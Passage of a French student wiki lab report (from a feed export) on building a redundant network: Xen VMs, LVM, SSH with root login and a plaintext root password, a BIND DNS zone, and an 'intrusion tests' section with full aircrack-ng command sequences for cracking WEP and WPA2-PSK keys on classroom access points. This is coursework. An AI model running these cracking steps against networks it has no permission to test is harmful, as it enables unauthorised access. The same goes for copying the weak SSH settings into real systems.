! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
Configuration du SSH &lt;br /&gt;
&lt;br /&gt;
Dans /etc/ssh/sshd_config, ajout des lignes :&lt;br /&gt;
 Port 2223&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis :&lt;br /&gt;
 &amp;gt; systemctl restart ssh&lt;br /&gt;
 &amp;gt; systemctl status ssh&lt;br /&gt;
 ssh.service - OpenBSD Secure Shell server&lt;br /&gt;
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e&amp;gt;&lt;br /&gt;
     Active: active (running) since Mon 2021-11-29 14:47:49 UTC; 2s ago&lt;br /&gt;
       Docs: man:sshd(8)&lt;br /&gt;
             man:sshd_config(5)&lt;br /&gt;
    Process: 3679 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)&lt;br /&gt;
   Main PID: 3680 (sshd)&lt;br /&gt;
      Tasks: 1 (limit: 230)&lt;br /&gt;
     Memory: 1.3M&lt;br /&gt;
        CPU: 21ms&lt;br /&gt;
     CGroup: /system.slice/ssh.service&lt;br /&gt;
             `-3680 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups&lt;br /&gt;
&lt;br /&gt;
Puis nous testons le SSH depuis le terminal de la Zabeth :&lt;br /&gt;
 &amp;gt; ssh root@193.48.57.177 -p 2223&lt;br /&gt;
 password : glopglopglop&lt;br /&gt;
&lt;br /&gt;
Nous arrivons à nous connecter, la configuration du SSh est donc un succès.&lt;br /&gt;
&lt;br /&gt;
Configuration du DNS :&lt;br /&gt;
&lt;br /&gt;
On a installé le package bind9 :&lt;br /&gt;
 &amp;gt;apt install bind9&lt;br /&gt;
&lt;br /&gt;
Sur le site gandit.net, nous avons modifié : &lt;br /&gt;
&lt;br /&gt;
Fenêtre Glue Records : ns1.paixdieu.site | 193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Fenêtre Serveurs de noms :&lt;br /&gt;
&lt;br /&gt;
DNS Primaire : ns1.paixdieu.site | DNS Secondaire : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/resolv.conf, ajout de la ligne :&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
Afin de configurer le DNS par defaut.&lt;br /&gt;
&lt;br /&gt;
Puis nous passons à la configuration du DNS primaire :&lt;br /&gt;
On ajoute donc une zone lié à notre domaine paixdieu.site de type master et le chemin de son fichier de configuration et on permet les transferts d'informations avec le DNS secondaire ns6.gandi.net d'IP 217.70.177.40.&lt;br /&gt;
&lt;br /&gt;
On ajoute donc les lignes suivantes dans /etc/bind/named.conf.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/named.conf.site&lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; IN {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.paixdieu.site&amp;quot;;&lt;br /&gt;
         allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Puis nous configurons la zone paixdieu.site, pour cela on ajoute les ns.&lt;br /&gt;
On ajoute les lignes suivantes dans /etc/bind/db.paixdieu.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/db.paixdieu.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.paixdieu.site. postmaster.paixdieu.site. (&lt;br /&gt;
                               4         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.paixdieu.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.177&lt;br /&gt;
 www     IN      A       193.48.57.177&lt;br /&gt;
         IN      AAAA    2001:7A8:116E:60B0:216:3eff:fe5e:9825 &lt;br /&gt;
&lt;br /&gt;
[esquisse à compléter]&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56717</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56717"/>
				<updated>2021-11-29T17:50:28Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* Plan d'adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
